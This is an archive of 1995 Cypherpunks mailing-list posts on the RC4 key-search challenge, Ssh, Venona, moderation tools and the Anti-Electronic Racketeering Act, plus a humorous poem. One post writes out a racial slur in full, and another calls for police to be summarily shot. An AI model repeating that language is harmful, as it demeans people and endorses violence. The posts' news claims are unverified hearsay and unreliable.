Maybe, *maybe*, TCP/IP port forwarding could be used for this?  (I
don't know what CFS does because I have never seen CFS.)

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 12 Jul 95 19:36:38 PDT
To: alex <cp@proust.suba.com>
Subject: Re: SSL RC4 challenge
In-Reply-To: <199507122003.PAA02843@proust.suba.com>
Message-ID: <Pine.SUN.3.91.950712223441.13007A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, alex wrote:

> Can't we hold off a few weeks on this, so that we can all short the stock 
> once it's been offered? <g>

Hmm...well, considering we have yet to break the first 40-bit RC4 key 
(with 87.1 of the keyspace searched), I think it might be a bit early to 
make financial decisions based on our cracking abilities.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rolf Michelsen <Rolf.Michelsen@delab.sintef.no>
Date: Wed, 12 Jul 95 13:47:21 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Re: QED_jak
In-Reply-To: <9507121445.AA10531@snark.imsi.com>
Message-ID: <Pine.3.89.9507122225.A949-0100000@ronda.er.sintef.no>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Perry E. Metzger wrote:

> The reports claimed the spys were using one time pads in some flawed
> manner, but did not explain very well what the problem was. Does
> anyone out there know?

According to Christopher Andrew in "KGB: The Inside Story" the Russians 
started to reuse one time pads near the end of the war due to the sheer 
volume of secret information being sent.  This was discovered by Meredith 
Gardener of the ASA in 1948 and later exploited to crack these messages.

The operation goes under the names of Venona and Bride.  The latter is 
used in Peter Wright's book "The Spycatcher's Encyclopedia of Espionage".

-- Rolf


Rolf.Michelsen@delab.sintef.no               "Nostalgia isn't what it
http://www.delab.sintef.no/~rolfm/            used to be..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher.Baker@f14.n374.z1.fidonet.org (Christopher Baker)
Date: Thu, 13 Jul 95 20:11:27 PDT
To: cypherpunks@toad.com
Subject: Re: Dr. Seuss, Technical Writer
Message-ID: <a75_9507122301@nisc.fidonet.org>
MIME-Version: 1.0
Content-Type: text/plain



 * In a message posted via CYPHERPUNKS dated: 11 Jul 95, you stated:

>               What If Dr. Seuss Did Technical Writing?
>
> Here's an easy game to play.
> Here's an easy thing to say:

and what if there was a complete version of this somewhere? [grin]

--- Following message extracted from REC.ORG.MENSA @ 1:374/14 ---
    By Christopher Baker on Thu Dec 15 11:27:49 1994

From: Mike Steiner
To: All
Date: 15 Dec 94  02:40:52
Subj: Bits in a Box
From: steiner@best.com (Mike Steiner)
Organization: Society for the Preservation of Endangered Societies

            A Grandchild's Guide to Using Grandpa's Computer
 
 
                     Bits   Bytes   Chips   Clocks
                     Bits in bytes on chips in box.
                 Bytes with bits and chips with clocks.
                      Chips in box on ether-docks.
 
             Chips with bits come.  Chips with bytes come.
               Chips with bits and bytes and clocks come.
 
               Look, sir. Look, sir. Read the book, sir.
               Let's do tricks with bits and bytes, sir.
              Let's do tricks with chips and clocks, sir.
 
               First, I'll make a quick trick bit stack.
                Then I'll make a quick trick byte stack.
                 You can make a quick trick chip stack.
                You can make a quick trick clock stack.
 
                  And here's a new trick on the scene.
                    Bits in bytes for your machine.
                  Bytes in words to fill your screen.
 
                  Now we come to ticks and tocks, sir.
                   Try to say this by the clock, sir.
 
                         Clocks on chips tick.
                         Clocks on chips tock.
                         Eight byte bits tick.
                         Eight bit bytes tock.
               Clocks on chips with eight bit bytes tick.
              Chips with clocks and eight byte bits tock.
 
                      Here's an easy game to play.
                    Here's an easy thing to say....
 
            If a packet hits a pocket on a socket on a port,
            and the bus is interupted as a very last resort,
       and the address of the memory makes your floppy disk abort
         then the socket packet pocket has an error to report!
 
          If your cursor finds a menu item followed by a dash,
      and the double-clicking icon puts your window in the trash,
       and your data is corrupted cause the index doesn't hash,
     then your situation's hopeless, and your system's gonna crash!
 
                 You can't say this? What a shame, sir!
                   We'll find you another game, sir.
 
          If the label on the cable on the table at your house
       says the network is connected to the button on your mouse,
          but your packets want to tunnel on another protocol,
        that's repeatedly rejected by the printer down the hall,
     and your screen is all distorted by the side-effects of gauss,
         so your icons in the window are as wavy as a souse,
          then you may as well reboot and go out with a bang,
          cause as sure as I'm a poet, the sucker's gonna hang!
 
       When the copy of your floppy's getting sloppy on the disk,
         and the microcode instructions cause unnecessary risc,
  then you have to flash your memory and you'll want to RAM your ROM.
      Quickly turn off your computer and be sure to tell your mom!
 
              (God bless you Dr. Seuss wherever you are!)
 
+----------------------------------------------------------------------+

  Origin: COBRUS - Usenet-to-Fidonet Distribution System (1:2613/335.0)

 -30-

TTFN.
Chris

--- GenMsg [0002] (cbak.rights@opus.global.org)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 12 Jul 95 14:17:00 PDT
To: sdw@lig.net
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <m0sW9UK-0009ydC@sdwsys>
Message-ID: <199507122116.AAA06846@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> I've been compiling under Linux and have had a number of autoconfiguration
> errors.  I'll produce a simple-minded patch shortly.
> (Thinks I'm cross-compiling, have some include files I don't, don't
> have waitpid/wait3, collision with stdc crypt/random defs, etc.)

I last configured and compiled ssh on Linux yesterday and had no
problems.  I have slackware 2.2.0.1, kernel 1.2.8, gcc-2.7.0.

Please include version numbers in your report.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johnl@radix.net
Date: Wed, 12 Jul 95 23:00:07 PDT
To: erc@khijol.intele.net
Subject: Re: Don't trust the net too much
Message-ID: <9507130556.AA0046@dialin3.annex1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


> A transistor radio puts out such a minute amount of RF (at 455 KHz and/or
> 10.7 MHz, the IF freqs of the radio) that most insturments designed to
> pick up RF can't detect this stuff from more than a few feet away.

The problem is caused by local oscillator radiation interfering with
the ILS receiver. Tune a FM broadcast band receiver to the right frequency and
you get local oscillator radiation at (f + 10.7 MHz), right in the
middle of the aviation band. 

//----------------------------------------------------------------------------
// John A. Limpert
// johnl@radix.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johnl@radix.net
Date: Wed, 12 Jul 95 23:31:27 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9507130630.AA0049@dialin3.annex1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


> I am searching for a time-stamping service that will sign some data of mine
> (or a hash thereof) along with a certificate indicating what time(,date,year)
> the signing occurred.  I want to use this to substantiate my claim that I
> was in possession of this data before others were.  (Useful for copyrights/
> patents, and possibly other things.)

I think Bellcore is providing a service like that. Check out their
WWW site (www.bellcore.com).

//----------------------------------------------------------------------------
// John A. Limpert
// johnl@radix.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 13 Jul 95 14:42:16 PDT
To: cypherpunks@toad.com
Subject: Fight, or Roll Over?
Message-ID: <v02120d19ac2aa1f17f4f@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Since the Anti-Electronic Racketeering Act of 1995 might as well
be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
Tim throw in the towel already, when the bill hasn't even made it
through committee yet.

Not that I place a lot of faith in our elected officials, but this
bill seems to step on so many toes, and to be so plainly idiotic,
that we are bound to get some support from unexpected quarters.
Nothing surprised me more, in fact, than all the mainstream IS
magazines (like Information Week) denouncing the Exon ammendment.

This, though, is a much more subtle and insidious bill, and takes away
something that most people don't even know they want yet.
(The Exon ammendment, on the other hand, could have been dubbed,
"The Cypherpunk Market-Creation Act of 1995.") Nevertheless,
it is certainly possible to fight this bill and win, while at
the same time, preparing to go underground if it passes.

Go underground? Well, as I read it, this bill basically makes
cypherpunks a "corrupt organization", subject to the full
impact of the RICO statutes. With the passage of this bill, we
will have the same status in the US as the neo-Nazis have in
Germany, and will have to adopt similar communications and
organization techniques. Who knows, maybe this is the best thing
that could happen, although I'm real curious about who will
back off to protect their ass-ets and who will actually keep
on chugging towards crypto anarchy.

In the short term, I've renewed or started memberships in the
organizations that are likely to fight this -- but I'm also
fired up to get more easy-to-use software out there, and
do what I can to help build infrastructure that can resist this
sort of nonsense.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Wed, 12 Jul 95 23:57:19 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: something to scare the *piss* out of ya
In-Reply-To: <ac1a3b190e021004ebf7@[205.199.118.202]>
Message-ID: <9507130656.AA09050@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



If this story is true, and can be substantiated, why the hell wern't
the cops involved prosecuted, or walked out to a wall
and summarily shot for crimes against humanity.

The last time I checked torture and dismemberment were
war crimes, and intolerable behavior in civilized nations.

If it *IS* true there goddamn well should be congressional
hearings on it. I would suggest contacting any of the
local news media in DC, but would reccommend the
local ABC affiliate, WJLA for contact since they are in the
midst of tearing the ATF a new asshole (and are going to do
the same to the FBI tomorrow night from what they say) over
the Waco raid.

The ABC affiliate here has caused new Senate hearings apparently,
it seems that the longer things go on, the more nastiness is dragged
out on this.

If this bit wasn't true, then it's despicable propaganda, and anyone
involved with it's distribution should be ashamed of themselves.
I do not believe liberty and democracy can easily survive if citizens
or public servants lie. True strength lives in honest discourse and
the actions of reasoned men, acting in a thoughtful and honest
manner.

It's damned easy to run around splattering the net with nasty
scare stories about the evils of LEO's, but it takes a bit
more to actually do something. I'd say with stuff like this
the best course would be to put up, and contact your elected
offcials, or shut up. Becasue if it is true, no decent person
should tolerate it. And if it isn't, damn the persons who lie
for obscuring the truth.



Tim Scanlon



________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 13 Jul 95 15:07:17 PDT
To: cypherpunks@toad.com
Subject: Re: co-sponsors
Message-ID: <v02120d1cac2aaebb8090@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>I searched Thomas and couldn't find any evidence of co-sponsors to the
>Senate bill. Am I wrong here?
>
>.pm

According to Shari Steele:

> Fortunately, the bill does not have a very promising future.  The bill has
> no co-sponsors.  It was immediately referred to the Committee on the
> Judiciary, where it currently sits.  LEXIS's bill tracking report only
> gives it a 10% chance of passing out of the committee.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Thu, 13 Jul 95 02:24:11 PDT
To: cypherpunks@toad.com
Subject: Claiming unwanted keyspace
Message-ID: <199507130932.DAA18813@zeezrom.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have begun searching the unwanted 31 bit keyspace cd70000000 to cdefffffff
and according to my calculations will be able to search two blocks of
31 bits a night until I get bored of starting the searches.

I will be running 8+ hp9000/715s at 27,200 keys/second each.

If someone was planning on searching this keyspace, let's decide on it.

Thanks to those who helped me get going.


Don



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stu@nemesis (Stuart Smith)
Date: Thu, 13 Jul 95 08:52:28 PDT
To: mjg51721@uxa.cso.uiuc.edu
Subject: Re: A more sophisticated form of moderation.
In-Reply-To: <199507111845.AA16926@uxa.cso.uiuc.edu>
Message-ID: <m0sWLbm-0007HvC@nemesis>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507111845.AA16926@uxa.cso.uiuc.edu> you write:
>Specifically, I was thinking along the lines of a newsgroup where only
>selected individuals are able to post, but anybody who wants to can read
>the group.  However, the "selected individuals" could fall into several
>categories.
<snip>

I think this is the wrong direction to go - I mean certainly, if a given
newsgroup or mailing list wants to have a secret decoder ring that one needs
to be in possession of to be allowed to post, they're more than welcome -
but viewer/reader/receiver level filtering is the way to go.  Most
newsreaders have kill files, a newsreader called strn (Scoring Threaded Read
News) takes it a step further.

In strn you have "score files" for hierarchies, groups, or certain topics,
and within these files you specify rules by which each article is given a
score.  You can then have all the articles below a certain score auto-killed
or you can just be presented with a list of articles, sorted highest score
to lowest.  This lets you not only, select you who *don't* want to read, as
a killfile does, but it also lets you choose who you *do* want to read, even
though every idiot can post.  This gets around the messy censorship
questions.

I use a program that takes a mailing list and posts it to a local newsgroup,
so I can read cypherpunks like I read news.  I tried to select the more
intelligent posters by giving them high scores, but I found it became rather
pointless, as most of the posters (with a few notable exceptions) are
worthwhile reading.  It is still useful for subject filtering however.

In any case, the concepts implemented in strn could easily be expanded and
coded into other popular newsreaders and mail agents.  I think this is a
much better solution.

Just a quick add-on thought - this whole discussion started from people
talking about moderation - the above is my answer to those who say we (or
any group) *needs* moderation.  If any group nonetheless *chooses* to
moderate, I have no quibble, but it cannot be said that it is necessary to
extract signal from noise.  I enjoy several moderated newsgroups and
mailing lists, and wouldn't give them up for the world, but it's not for
everyone.  I think this is a good example of repuations at work, in good
cypherpunk form.  I read moderated groups and lists where the moderater in
question has shown good form and judgement and thus has a good reputation -
I would avoid groups moderated by those who demonstrate otherwise.

It was pointed out that there is a moderated cypherpunks list (I don't know
anything about - I'm assuming its some one who gets the list and forwards
some part of it, the signal, to the smaller "moderated" list)  This is
really good example of moderation in that the unmoderated raw feed is still
available.  Imagine if there were two groups, rec.arts.erotica and
rec.arts.erotica.moderated or somesuch, the latter being a subset of the
former.  That way everybody gets to have their cake and eat it too.

- --
 Baba baby mama shaggy papa baba bro baba rock a shaggy baba sister
shag saggy hey doc baba baby shaggy hey baba can you dig it baba baba
E7 E3 90 7E 16 2E F3 45  *   Stuart Smith  *  28 24 2E C6 03 02 37 5C 
     <stu@nemesis.wimsey.com>  *  http://www.wimsey.com/~ssmith/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAT21ai5iP4JtEWBAQEx1wP7BthRjlkOveACG8lbAPDu9b52PznTdEh7
TYLyZGR9/HqQc3ExLMb0051Lo3LaSbh4T7BM6/ZHNOeLZpi4lVqzu7fJCK2dA33Q
a2emExbanU/YPnIdiuZZ/bOcWhUbmdDRJ0TttNja1jLpmokQ6RpYs3P2ke+jfi19
rjCwQYhc4oM=
=hxjj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 13 Jul 95 16:21:19 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <v02120d20ac2abc80bcca@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>At 10:41 AM 7/13/95, Douglas Barnes wrote:
>
>>Since the Anti-Electronic Racketeering Act of 1995 might as well
>>be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
>>Tim throw in the towel already, when the bill hasn't even made it
>>through committee yet.
>
>I'd hardly call my view "throwing in the towel." What I said clearly enough
>was that the Washingtonians can throw out repressive legislation much
>faster than we can--and I speak in terms of "we" as being the EFF, EPIC,
>NRA, ACLU, etc., and _not_ the Cyherpunks, who have no lobbying activities
>to speak of.
>

I'm not advocating that cypherpunks lobby -- we clearly don't have the
organization or the right image to be doing that. I _do_ think that it's
important to support the EFF, EPIC and ACLU who will almost certainly
be fighting this very important rearguard action while we try to get
_our_ act together. I'm not sure the NRA bears on this exact matter,
but I think it's high time one of the other three started doing "jack
booted thug"-type fundraising letters.

This means, for those not reading between the lines, doing something
more than online ranting and petition-signing, such as getting out the
checkbook and supporting those who are organized to fight these things,
and actually getting off the dime and doing things like writing letters,
sending telegrams, and otherwise harassing our elected beings through
media that they understand (since, clearly, they _don't_ understand
the Internet -- if they did, they wouldn't propose legislation like this.)

Yes, the "bad guys" can crank out unfriendly legislation faster than
the "good guys" can fight it, but since we are clearly not ready to offer
technological solutions this month, the "good guys" act as a valuable
brake on this current swing of the pendulum.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmm0021@alamo.net (Jason Montgomery)
Date: Thu, 13 Jul 95 06:09:07 PDT
To: cypherpunks@toad.com
Subject: There is a God
Message-ID: <2yc78c1w165w@alamo.net>
MIME-Version: 1.0
Content-Type: text/plain


On ABC's latenight news program I just saw a story that renewed my faith 
that there is a God and he is brown.  It seems that the Alabama Milita 
was able to film a ATF event that was truly horrifing to behold.  Nigger 
Hunging Licenses and the works.  Well our friends in Alabama gave the 
tapes to ABC and the story was blown wide open.  Our friends from Alabama 
in the pursuit of the ATF did the world a great service and completely 
restored my faith in America.

Jason Montgomery

ps.  The spelling errors are all mine its 6 in the morning and im out of 
caffine.

----------------------------------------------------------------
Jason Montgomery                            
jmm0021@alamo.net                           
----------------------------------------------------------------
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Thu, 13 Jul 95 03:24:31 PDT
To: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Subject: Re: Don't trust the net too much  (or at all)
In-Reply-To: <Pine.3.89.9507102051.G1184-0100000@khijol>
Message-ID: <9507131022.AA09335@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net> writes:

|The POPs communicate with Netcom in San Jose.  As I understand it, Netcom
|isn't a true distributed computing environment - all the server machines
|are in San Jose.  Take out the servers, you take out the ISP.

There's no need to use bombs, guns, any of that nastiness.
As somone pointed to here allready, it's far easier and
safer to use technical means.

Unfortunatly for far too many ISP's, saying security is like
speaking words in an alien tounge. They just don't get it,
and even if they do, they don't want to spend the money on
it, or worse yet, (and more commonly lately) allocate some
poor sod who becomes the overnight expert on it, which is worse
than admitting that it's not a high priority.

Basicly, it amounts to hack 'em and drop 'em.

What is to prevent the [hostiles] from trying to develop
code to secretly monitor machines at ISP's and other
places? And then just take them out whenever they want...
Nothing I belive.

Except perhaps the security offered by decent & avalible
encryption.


Tim Scanlon



________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM
Date: Thu, 13 Jul 95 06:30:01 PDT
To: cypherpunks@toad.com
Subject: Re:  Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <9507131331.AA00800@homeboy.local>
MIME-Version: 1.0
Content-Type: text/plain


>      "(2) to distribute computer software that encodes or encrypts
>    electronic or digital communications to computer networks that the
>    person distributing knows, or reasonably should know, is accessible to
>    foreign nationals and foreign governments, regardless of whether such
>    software has been designated nonexportable."

It would be kind of nice if we could get some first amendment protection
for electronic media speech.

Next thing you know they will want to extend RICO to librarians.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Thu, 13 Jul 95 03:34:24 PDT
To: cypherpunks@toad.com
Subject: Re: Speedup of bruterc4.c
In-Reply-To: <Pine.SOL.3.91.950711094531.24661C-100000@eagle.nexor.co.uk>
Message-ID: <9507131033.AA09374@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone paralellized this code? I'm interested in running it
on a paragon. Email me if you have or if you think this is worth
bothering with.

Tim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM
Date: Thu, 13 Jul 95 06:39:32 PDT
To: bdolan@use.usit.net
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <9507131341.AA00807@homeboy.local>
MIME-Version: 1.0
Content-Type: text/plain


Even scarier is the Storm Trooper Exception (ala Steve Jackson):

            (j) Privacy Protection Act: Section 101 of the Privacy Protection
          Act of 1980 (42 U.S.C. 2000aa) is amended--
                (1) in subsection (a)--
                    (A) by striking `or' at the end of paragraph (1);
                    (B) by striking the period at the end of paragraph (2) 
                  and inserting `; or'; and
                    (C) by adding at the end the following new paragraph:
                `(3) there is reason to believe that the immediate seizure of
              such materials is necessary to prevent the destruction or
              altercation of such documents.'; and
                (2) in subsection (b)--
                    (A) by striking `or' at the end of paragraph (3);
                    (B) by striking the period at the end of paragraph (4) 
                  and inserting `; or'; and
                    (C) by adding at the end the following new paragraph:
                `(5) in the case of electronically stored data, the seizure 
              is incidental to an otherwise valid seizure, and the government
              officer or employee--
                    `(A) was not aware that work product material was among
                  the data seized;
                    `(B) upon actual discovery of the existence of work
                  product materials, the government officer or employee took
                  reasonable steps to protect the privacy interests 
                  recognized by this section, including--
                        `(i) using utility software to seek and identify
                      electronically stored data that may be commingled or
                      combined with non-work product material; and
                        `(ii) upon actual identification of such material,
                      taking reasonable steps to protect the privacy of the
                      material, including seeking a search warrant.'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Thu, 13 Jul 95 03:50:05 PDT
To: alt@iquest.net (Al Thompson)
Subject: Re: RACIST MILITIA: ATF
In-Reply-To: <m0sVs4F-000BYfC@dorite1.iquest.net>
Message-ID: <9507131048.AA09393@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I can confirm this, and a story was broadcast on the local
ABC news affiliate (WJLA) that talked about this and Waco
some. Congressional hearings by the senate have been sceduled
as a result. I saw vidiotape of the signs referenced in the
article posted to the list. I did not see T-Shirts, but I
did see a whole lot of 'confederate flags' as well as allot
of serious drinking and hell raising by burly dudes who
looked like they'd be more comfortable in body armor.


Tim Scanlon

________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 03:59:25 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SOL.3.91.950712171632.1850A-100000@use.usit.net>
Message-ID: <9507131059.AA20485@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"If you read one thread this year, read this one"

One way to find the following text is to look up S.974 on Thomas,
http://thomas.loc.gov/, and follow the "references to this bill in the
Congressional Record" link. Here's the URL I used, but I suspect this query
won't work from scratch: 
http://rs9.loc.gov/cgi-bin/query/2?r104:./temp/~r10443Io:e50455:+@1(S.+974)++

Deep down, I didn't truly believe it would come to this. Now I'm a believer.
I've inserted a few comments. If they seem alarmist, perhaps it's because
I'm alarmed !  I actually find Grassley's comments more frightening than the
text of the bill itself....

I get the impression that this amendment might also jeopardize anonymous
digital cash; Sec. 1030 (a) (3) makes it unlawful to "use a computer or
computer network to transmit a communication intended to conceal or hide the
origin of money or other assets, tangible or intangible, that were derived
from racketeering activity."  All these limitations on cryptography and
privacy seem to shift the effective burden of proof from the prosecution to
the defense -- Jennifer Q. Public can't keep anything out of the prosecution's
eyes, in case she might be laundering Mafia dough. 

If they're pursuing a similar argument with this amendment, anonymous
remailing may be in trouble too. 

 --- Begin Included Text ---

STATEMENTS ON INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate - June
27, 1995) 
Sen. GRASSLEY

Mr. GRASSLEY. Mr. President, I rise this evening to introduce the
Anti-electronic Racketeering Act of 1995. This bill makes important changes
to RICO and criminalizes deliberately using computer technology to engage in
criminal activity. I believe this bill is a reasonable, measured and strong
response to a growing problem. According to the computer emergency and
response team at Carnegie-Mellon University, during 1994, about 40,000
computer users were attacked. Virus hacker, the FBI's national computer
crime squad has investigated over 200 cases since 1991. So, computer crime is
clearly on the rise.

Mr. President, I suppose that some of this is just natural. Whenever man
develops a new technology, that technology will be abused by some. And that
is why I have introduced this bill. 

<< to make sure nobody can use it, lest they "abuse" it...

I believe we need to seriously reconsider
the Federal Criminal Code with an eye toward modernizing existing statutes
and creating new ones. In other words, Mr. President, Elliot Ness needs to
meet the Internet.

Mr. President, I sit on the Board of the Office of Technology Assessment.
That Office has clearly indicated that organized crime has entered cyberspace
in a big way. International drug cartels use computers to launder drug money
and terrorists like the Oklahoma City bombers use computers to conspire to
commit crimes.

<< I haven't heard much to suggest that McVeigh was using a
<< computer for anything, but we all saw this line coming, right ?
<< 3 of Tim's 4 Horsemen of the Infocalypse figure prominently here; I guess
<< Exon & Gorton have ridden off after the fourth already....

Computer fraud accounts for the loss of millions of dollars per year. And
often times, there is little that can be done about this because the computer
used to commit the crimes is located overseas. So, under my bill, overseas
computer users who employ their computers to commit fraud in the United
States would be fully subject to the Federal criminal laws. 

<< So the U.S. Government now considers, among other things, the entire
<< Internet to fall under its jurisdiction. I think he's referring to 
<< Sec. 1030 A (g). The provisions of that subsection apply to the entire
<< enclosing section, which under this amendment would include the
<< prohibition on non-GAK crypto on the net.

Also under my
bill, Mr. President, the wire fraud statute which has been successfully used by
prosecutors for many users, will be amended to make fraudulent schemes
which use computers a crime.

It is not enough to simply modernize the Criminal Code. We also

have to reconsider many of the difficult procedural burdens that prosecutors
must overcome. For instance, in the typical case, prosecutors must identify a
location in order to get a wiretapping order. But in cyberspace, it is often
impossible to determine the location. And so my bill corrects that so that if
prosecutors cannot, with the exercise of effort, give the court a location, then
those prosecutors can still get a wiretapping order. 

<< I'm not sure where in the bill this is delineated. Would the police be
<< given a carte blanche to root around wherever the mood strikes them ?

And for law
enforcers--both State and Federal--who have seized a computer which
contains both contraband or evidence and purely private material, I have
created a good-faith standard so that law enforcers are not shackled by
undue restrictions but will also be punished for bad faith.

<< All together now: "TRUST US"

Mr. President, this brave new world of electronic communications and global
computer networks holds much promise. But like almost anything, there is the
potential for abuse and harm. That is why I urge my colleagues to support
this bill and that is why I urge industry to support this bill.

On a final note, I would say that we should not be too scared of
technology. 

<< Did a staffer write this ?

After all, we are still just people and right is still right and
wrong is still wrong. Some things change and some things do not. 

<< Did George Bush write this ?

All that
my bill does is say you can't use computers to steal, to threaten others or
conceal criminal conduct.

<< Ah, if that's all it does, why not scrap the whole thing and not waste
<< the Senate's valuable time ?  After all, stealing, threatening, and
<< concealing criminal conduct are already outlawed....

Mr. President, I ask unanimous consent that the text of the bill be printed
in the Record.

There being no objection, the bill was ordered to be printed in the Record,
as follows:
[...]

 --- End Included Text ---

<< -Lewis "Futplex" McCarthy <lmccarth@cs.umass.edu>
<< I am not a lawyer

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAT8VGf7YYibNzjpAQEuWwQAx4dzd38Cj/2nwR/gDd89TmztX6KlG/cM
Aq7veVSH6aEw/8OcHvaiROhIcDww5xJwGFcQXFil1v5sJvg7667e93ybhIiv0Hw1
0/XRvwh0K1pG3GkozISJLPSeuz8EHlZukpV8fv3iZxuSdbIMGJYQT0WmvB736RuW
yF9b047mX4E=
=G4jp
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 05:12:07 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507122221.AA24506@toad.com>
Message-ID: <9507131212.AA21613@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


bal writes:
> It's much worse than this.  Look at the definition of "predicate act":
> 
>             `(b) For purposes of this section, each act of distributing
>           software is considered a separate predicate act. Each instance in
>           which nonexportable software is accessed by a foreign government, 
>           an agent of a foreign government, a foreign national, or an agent 
>           of a foreign national, shall be considered as a separate predicate
>           act.
> 
> Now, since the bill also makes 1030A violations "racketeering
> activities", all you need are two predicate acts and RICO comes into
> play.  

In the subsection that explicitly mentions crypto, it says that it's
unlawful to put (non-GAK) crypto on an open net, "regardless of whether such
software has been designated non-exportable". If the phrase "nonexportable"
means the same thing in the context of this subsection, then provision (b)
would only seem to apply RICO to stuff that already falls under ITAR.

For whatever it covers, this provision conveniently makes you liable for the
actions of others. I could see quid pro quo between governments coming into
play here. They can get practically anyone connected with a foreign country 
to click a button on a Web browser, download PGP half a dozen times, and then
hit you with 7 counts of racketeering. Hey, they could run a net searcher
daemon that automatically snags a heap of copies of anything it finds that
looks like a non-GAK crypto app.  

[...]
> Get a copy of this bill from:
> 
> 		ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP
> 
> and read it.  
> 
> 					--bal

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 13 Jul 95 05:52:52 PDT
To: cypherpunks@toad.com
Subject: LOU_nex
Message-ID: <199507131252.IAA01827@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-13-95. NYPaper Page Oner:


   "Senior F.B.I. Agent Suspended in Probe Of a Deadly Siege."

      The Federal Bureau of Investigation has suspended a
      senior career agent as a result of a Justice Department
      inquiry into whether officials destroyed important
      documents about the agency's bloody 1992 standoff with
      a white separatist in Idaho, law-enforcement officials
      said today. The suspension of the agent, E. Michael
      Kahoe, who was an official at F.B.I. headquarters during
      the Idaho siege, sent a shock wave through the agency's
      upper ranks.                                   LOU_nex











